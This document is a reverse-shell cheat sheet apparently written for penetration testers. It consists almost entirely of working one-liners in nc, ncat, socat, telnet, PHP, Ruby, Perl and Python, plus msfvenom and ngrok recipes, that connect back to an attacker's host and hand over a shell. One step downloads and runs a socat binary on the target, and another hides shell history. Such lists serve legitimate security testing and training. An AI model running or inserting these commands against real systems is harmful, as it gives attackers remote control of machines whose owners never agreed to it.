
REVERSE SHELL

Resources

https://alamot.github.io/reverse_shells/

https://github.com/ShutdownRepo/shellerator

Basics / Classical

Reverse shell:
nc -nv IP 443 -e /bin/bash
ncat --udp IP 443 -e /bin/bash

OR

/bin/sh | nc ATTACKING-IP 443

OR

rm -f /tmp/x; mknod /tmp/x p && nc <IP> <PORT> 0</tmp/x | /bin/bash 1>/tmp/x 
rm -f /tmp/x; mknod /tmp/x p && /bin/nc.openbsd <IP> <PORT> 0</tmp/x | /bin/bash 1>/tmp/x

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> > /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc.openbsd <IP> <PORT> > /tmp/f

OR

/bin/nc.traditional <IP> <PORT> -e /bin/bash 
/bin/nc.traditional <IP> <PORT> -c /bin/bash

# Socat reverse shell allows a full TTY

# Attacker machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Target machine
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:100.100.100.100:4444

Reverse shell using ngrok

# On attacker (term1)
ngrok tcp 12345

# On attacker (term2)
nc -lvp 12345

# On target, use your reverse shell payload on the ngrok tunnel target
nc 0.tcp.ngrok.io <port> -e /bin/sh

## PHP Reverse Shell 

php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# Using msfvenom
msfvenom -p php/shell/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.php

# You can also use the PHP reverse shell by pentestmonkey, which comes with a complete handler and is available in Kali by default

Telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

OR

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet <IP> <PORT> > f
rm -f x; mknod x p && telnet <IP> <PORT> 0<x | /bin/bash 1>x

(Listen on port 443 on the attacking machine)

Ruby

# Linux
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<IP>",<PORT>);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Windows
ruby -rsocket -e "c=TCPSocket.new('<IP>',<PORT>);while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Perl

# Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# Linux
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))\
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");\
open(STDERR,">&S");exec("/bin/sh -i");};'

Python

#!/usr/bin/env python
# Minimal TCP reverse shell: opens an outbound connection to the hard-coded
# address and gives an interactive /bin/sh that socket as stdin/stdout/stderr.
import socket,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.179",443))  # outbound connect to the listener; address and port are fixed in the script
os.dup2(s.fileno(),0)  # fd 0 (stdin)  <- socket
os.dup2(s.fileno(),1)  # fd 1 (stdout) -> socket
os.dup2(s.fileno(),2)  # fd 2 (stderr) -> socket
# The child shell inherits fds 0-2, so all its I/O rides the connection.
# Detection note: a /bin/sh whose fds 0-2 resolve to a network socket is
# the artefact this pattern leaves on the host.
os.system("/bin/sh -i")

OR

python -c "import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('IP',443));\
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.system('/bin/sh -i')"

# UDP
python -c 'import socket,pty,os;lhost = "IP"; lport = 100;\
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport));\
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);\
os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'

# Python PTY shells (python-pty-shells)
# Can be very useful
simpleHTTPServer
wget ... -O /dev/shm/.rev.py
python tcp_pty_shell_handler -b ip:port